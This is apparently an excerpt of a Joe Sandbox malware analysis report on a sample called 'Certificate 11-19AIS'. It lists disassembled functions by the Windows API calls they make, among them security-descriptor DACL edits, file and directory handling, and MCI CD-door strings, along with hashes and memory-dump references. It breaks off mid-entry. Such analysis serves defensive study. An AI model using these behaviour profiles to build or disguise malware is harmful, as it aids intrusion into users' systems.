                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 1212759294-1154884017
                                                                              • Opcode ID: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                                              • Instruction ID: 91c25fb08b808af320f20bbf11f0c3603cb9862e3b515d3ab1c8f016353cf25c
                                                                              • Opcode Fuzzy Hash: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                                              • Instruction Fuzzy Hash: 71618A71500219FAEB249F64DC46FEE7BACFF28724F104506F915E61D1EBB4A990CBA0
                                                                              Function 007FD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • CharLowerBuffW.USER32(?,?), ref: 007FD292
                                                                              • GetDriveTypeW.KERNEL32 ref: 007FD2DF
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD327
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD35E
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD38C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 1148790751-4113822522
                                                                              • Opcode ID: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                                              • Instruction ID: 72c9f8331c0b5041b3d2a01fb49cd0b71e5b555474fa4bfa8500342ea15a002a
                                                                              • Opcode Fuzzy Hash: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                                              • Instruction Fuzzy Hash: F1514871104708DFC710EF10C885AAAB3E5FF88718F00885CF995A7291DB39EE0ACB92
                                                                              Function 007F26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?), ref: 007F26F1
                                                                              • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F26FA
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?,00000016), ref: 007F271C
                                                                              • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F271F
                                                                              • __swprintf.LIBCMT ref: 007F276F
                                                                              • __swprintf.LIBCMT ref: 007F2780
                                                                              • _wprintf.LIBCMT ref: 007F2829
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F2840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 618562835-2268648507
                                                                              • Opcode ID: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                                              • Instruction ID: 0fd80d1bcc54c3e2697d30d950cc13fba69d87715a9c42f434a8dd494e068335
                                                                              • Opcode Fuzzy Hash: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                                              • Instruction Fuzzy Hash: 4D412C7280021DFACB15FBD0DD8AFEEB778AF54340F500065B601B2192EA786F49CB61
                                                                              Function 007FD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007FD0D8
                                                                              • __swprintf.LIBCMT ref: 007FD0FA
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 007FD137
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007FD15C
                                                                              • _memset.LIBCMT ref: 007FD17B
                                                                              • _wcsncpy.LIBCMT ref: 007FD1B7
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007FD1EC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007FD1F7
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 007FD200
                                                                              • CloseHandle.KERNEL32(00000000), ref: 007FD20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 2733774712-3457252023
                                                                              • Opcode ID: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                                              • Instruction ID: aaaf9cb0da02f419c2644c292adf2e5739c0de99eb945ba42edd64236c28c843
                                                                              • Opcode Fuzzy Hash: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                                              • Instruction Fuzzy Hash: C531AFB2900209ABDB21DFA0DC49FEB77BDFF89700F1044B6F609D2260E7749A458B64
                                                                              Function 0081E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0081BEF4,?,?), ref: 0081E754
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E76B
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E776
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E783
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0081E78C
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E79B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0081E7A4
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7AB
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7BC
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0083D9BC,?), ref: 0081E7D5
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0081E7E5
                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0081E809
                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0081E834
                                                                              • DeleteObject.GDI32(00000000), ref: 0081E85C
                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0081E872
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3840717409-0
                                                                              • Opcode ID: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                                              • Instruction ID: e34832167a8318199980466c1e7d00c475e94fb08dac0c1e3837d22d829bb25a
                                                                              • Opcode Fuzzy Hash: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                                              • Instruction Fuzzy Hash: 81411875600208AFDB119F65EC88EAABBB8FF89715F104868F916D72A0D770A941DB60
                                                                              Function 008005F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 0080076F
                                                                              • _wcscat.LIBCMT ref: 00800787
                                                                              • _wcscat.LIBCMT ref: 00800799
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008007AE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008007C2
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 008007DA
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008007F4
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800806
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                              • String ID: *.*
                                                                              • API String ID: 34673085-438819550
                                                                              • Opcode ID: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                                              • Instruction ID: e04c757cf55f76c68f9d1e02cc7cb195c44bf56e71af5801f2a71554e786496f
                                                                              • Opcode Fuzzy Hash: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                                              • Instruction Fuzzy Hash: CC81AE715043459FCBA0DF24CC44AAEB3E9FBD8304F18882EF899C7291EA35D9448F92
                                                                              Function 0081EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0081EF3B
                                                                              • GetFocus.USER32 ref: 0081EF4B
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0081EF56
                                                                              • _memset.LIBCMT ref: 0081F081
                                                                              • GetMenuItemInfoW.USER32 ref: 0081F0AC
                                                                              • GetMenuItemCount.USER32(00000000), ref: 0081F0CC
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0081F0DF
                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0081F113
                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0081F15B
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0081F193
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0081F1C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: edc4a600e003f0b6fc51333ba65ca390b4cae5a6dc597a001b536dd3e6fa91c4
                                                                              • Instruction ID: ddc84a8e6d822afda927d4f996b6cb7a2cba68ebb9ac3eeb4b76d150932cf5f6
                                                                              • Opcode Fuzzy Hash: edc4a600e003f0b6fc51333ba65ca390b4cae5a6dc597a001b536dd3e6fa91c4
                                                                              • Instruction Fuzzy Hash: 26816B71104301EFDB11CF14D888AAABBE9FF88714F10492EFA99D7292D770D985CB92
                                                                              Function 007EA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                                • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                                • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                                • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                                • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                                                • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                                                • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA8CB
                                                                              • _memset.LIBCMT ref: 007EA8E0
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA8FF
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA910
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007EA94D
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA969
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA986
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA995
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EA99C
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA9BD
                                                                              • CopySid.ADVAPI32(00000000), ref: 007EA9C4
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA9F5
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EAA1B
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EAA2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                                              • Instruction ID: dc3485dc9a6ab4ecd7914e772b0fcf68b2d205fa5ea4a6105dd99a8e0996e348
                                                                              • Opcode Fuzzy Hash: 6ffc45b82405277e51d464c10c016cfb9ce821bdc94b2ea215b5d5905a63be60
                                                                              • Instruction Fuzzy Hash: EB515DB1901249BFDF04DFA1DD85AEEBB79FF48300F048529F811AB290DB38A905CB61
                                                                              Function 00809DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00809E36
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00809E42
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00809E4E
                                                                              • SelectObject.GDI32(00000000,?), ref: 00809E5B
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00809EAF
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00809EEB
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00809F0F
                                                                              • SelectObject.GDI32(00000006,?), ref: 00809F17
                                                                              • DeleteObject.GDI32(?), ref: 00809F20
                                                                              • DeleteDC.GDI32(00000006), ref: 00809F27
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00809F32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 63bbbf021643e77dc33b8f3410b482b147b9d40d2ceedb7b7dd7daae4173a1fd
                                                                              • Instruction ID: 044db2d98f904595bff09ad3f0219b08e37cd170309b318f1333d91931dd1e73
                                                                              • Opcode Fuzzy Hash: 63bbbf021643e77dc33b8f3410b482b147b9d40d2ceedb7b7dd7daae4173a1fd
                                                                              • Instruction Fuzzy Hash: AE513776900309EFCB14CFA8DC85EAEBBB9FF48710F14881DF999A7250D771A9418B90
                                                                              Function 007FCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-2391861430
                                                                              • Opcode ID: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                                              • Instruction ID: 9684ea3570ddb10ce76308082932160563faa56312b85cd604bc8b24c28bfe34
                                                                              • Opcode Fuzzy Hash: 6d3c75ee374017bb57bae6eb57abf61e92029862e00e896e1501b8101aebc66e
                                                                              • Instruction Fuzzy Hash: 42516A7190020DFACB16EBA4CE4AFEEB778EF04304F104065F515722A2EB396E59DB61
                                                                              Function 007FCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString__swprintf_wprintf
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 2889450990-3420473620
                                                                              • Opcode ID: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                                              • Instruction ID: 95d3309e8cba7f1f60d9cb7628a989f57de8ec3de01691ba1123582e7ea11bd9
                                                                              • Opcode Fuzzy Hash: 665b8b13777875e2f5fd96196b95e3691fdd43f0b822a0e0e0e281c6fbf2981d
                                                                              • Instruction Fuzzy Hash: 75516D7190060DEADF15EBA4DE4AFEEB778AF04340F104065F605722A2EA386F59DF61
                                                                              Function 007F55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F55D7
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007F5664
                                                                              • GetMenuItemCount.USER32(00871708), ref: 007F56ED
                                                                              • DeleteMenu.USER32(00871708,00000005,00000000,000000F5,?,?), ref: 007F577D
                                                                              • DeleteMenu.USER32(00871708,00000004,00000000), ref: 007F5785
                                                                              • DeleteMenu.USER32(00871708,00000006,00000000), ref: 007F578D
                                                                              • DeleteMenu.USER32(00871708,00000003,00000000), ref: 007F5795
                                                                              • GetMenuItemCount.USER32(00871708), ref: 007F579D
                                                                              • SetMenuItemInfoW.USER32(00871708,00000004,00000000,00000030), ref: 007F57D3
                                                                              • GetCursorPos.USER32(?), ref: 007F57DD
                                                                              • SetForegroundWindow.USER32(00000000), ref: 007F57E6
                                                                              • TrackPopupMenuEx.USER32(00871708,00000000,?,00000000,00000000,00000000), ref: 007F57F9
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007F5805
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                                              • Instruction ID: 2bb70f5aa57112003dd5a1f325e2c5c30424cabd75b1a9cdcf7fa1408d9af0ce
                                                                              • Opcode Fuzzy Hash: 2a37b569db428de59e5b2faf760b9830f1ee3202b69161edfe9ed7a6524b27c5
                                                                              • Instruction Fuzzy Hash: 2971C270641A0DBBEB219B54DC89FBABF65FF40768F244205F728AA3D1C7795810DBA0
                                                                              Function 007EA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007EA1DC
